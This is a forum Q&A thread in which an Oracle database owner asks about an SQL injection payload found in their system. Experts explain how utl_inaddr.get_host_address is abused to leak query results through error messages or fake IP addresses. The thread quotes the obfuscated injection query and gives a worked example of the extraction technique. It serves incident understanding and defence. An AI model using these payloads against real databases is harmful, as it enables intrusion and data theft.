Solved

sql injection to select utl_inaddr.get_host_address and XS$CACHE_DELETE

Posted on 2014-01-15
7
1,697 Views
Last Modified: 2014-01-15
found that someone use sql injection to run this sql in my oracle database via web application. I don't get his purpose. why use utl_inaddr.get_host_address and number of columns in XS$CACHE_DELETE???

select utl_inaddr.get_host_address(((
SELECT CAST (COUNT (column_name) AS CHAR (10))
  FROM all_tab_columns
 WHERE table_name =
             CHR (88)
          || CHR (83)
          || CHR (36)
          || CHR (67)
          || CHR (65)
          || CHR (67)
          || CHR (72)
          || CHR (69)
          || CHR (95)
          || CHR (68)
          || CHR (69)
          || CHR (76)
          || CHR (69)
          || CHR (84)
          || CHR (69)
))) from dual

Open in new window

0
Comment
Question by:Hoboly
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
  • 4
  • 3
7 Comments
 
LVL 74

Assisted Solution

by:sdstuber
sdstuber earned 500 total points
ID: 39784466
Do you have a table called "XS$CACHE_DELETE"  ?


The purpose of using utl_inaddr.get_host_address  is a quirk of the error message returned by the function.  If the host name passed in produces an error, that "name" will be returned as part of the error

For example....

select utl_inaddr.get_host_address('something that will produce an error') from dual

ORA-29257: host something that will produce an error unknown
                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Open in new window


So, by nesting a query inside the function call , the query is executed and the output of the query is taken as a host name that will likely be illegal and generate an error.  Then that illegal text will be returned as part of the error message
0
 

Author Comment

by:Hoboly
ID: 39784470
no XS$DELETE
but these is a table XS$CACHE_DELETE

SQL> desc XS$CACHE_DELETE
 Name                                      Null?    Type
 ----------------------------------------- -------- ----------------------------
 OBJ_TYPE                                           NUMBER(2)
 NAME                                               VARCHAR2(4000)
 DEL_DATE                                  NOT NULL TIMESTAMP(6)

SQL>

should be standard oracle 11g table
0
 

Author Comment

by:Hoboly
ID: 39784471
thanks Sdstuber
but I don't get it why COUNT (column_name)  into utl_inaddr.get_host_address.
if he wants to get the ip, he can just use utl_inaddr.get_host_address(host name) instead of utl_inaddr.get_host_address(column count)
0
Independent Software Vendors: We Want Your Opinion

We value your feedback.

Take our survey and automatically be enter to win anyone of the following:
Yeti Cooler, Amazon eGift Card, and Movie eGift Card!

 
LVL 74

Accepted Solution

by:
sdstuber earned 500 total points
ID: 39784476
He doesn't want an ip address, he wants the query results.
That's the key to the injection.  By failing you get to see the inner query results.
Or by constructing a query that returns a numeric result that number will appear as part of an ip address even though it really isn't one.


Try this...

SELECT UTL_INADDR.get_host_address(
           'There are ' || (SELECT COUNT(*) FROM dba_tables) || ' tables in this database'
       )
  FROM DUAL;

You should get an error something like this.
The 2923 will be vary based on your system.


ORA-29257: host There are 2923 tables in this database unknown



As I said above, the inner query is executed and the results are returned in the error.
0
 
LVL 74

Expert Comment

by:sdstuber
ID: 39784483
XS$CACHE_DELETE - sorry, I posted that then saw my mistake and corrected it.

I don't know of a specific hack to utilize that table or its contents; but it's mere existence would tell the hacker that XDB has been installed and that knowledge can provide a new attack vector.
0
 
LVL 74

Expert Comment

by:sdstuber
ID: 39784487
Actually, on further review of the initial query,  the error message part probably isn't going to happen.  Sorry for the confusion

If you run the injection query you should get either

0.0.0.0    -- meaning you do not have the table, i.e. XDB is not installed
 or
0.0.0.3    -- meaning you do have the table, i.e XDB is installed


Using the same technique though,  you can execute other queries and check the error messages to see what the results of those queries will be
0
 

Author Closing Comment

by:Hoboly
ID: 39784490
Excellent explanation! Thanks!
0

Featured Post

Salesforce Made Easy to Use

On-screen guidance at the moment of need enables you & your employees to focus on the core, you can now boost your adoption rates swiftly and simply with one easy tool.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Introduction This article explores the design of a cache system that can improve the performance of a web site or web application.  The assumption is that the web site has many more “read” operations than “write” operations (this is commonly the ca…
From implementing a password expiration date, to datatype conversions and file export options, these are some useful settings I've found in Jasper Server.
This video shows syntax for various backup options while discussing how the different basic backup types work.  It explains how to take full backups, incremental level 0 backups, incremental level 1 backups in both differential and cumulative mode a…
Via a live example, show how to take different types of Oracle backups using RMAN.

734 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question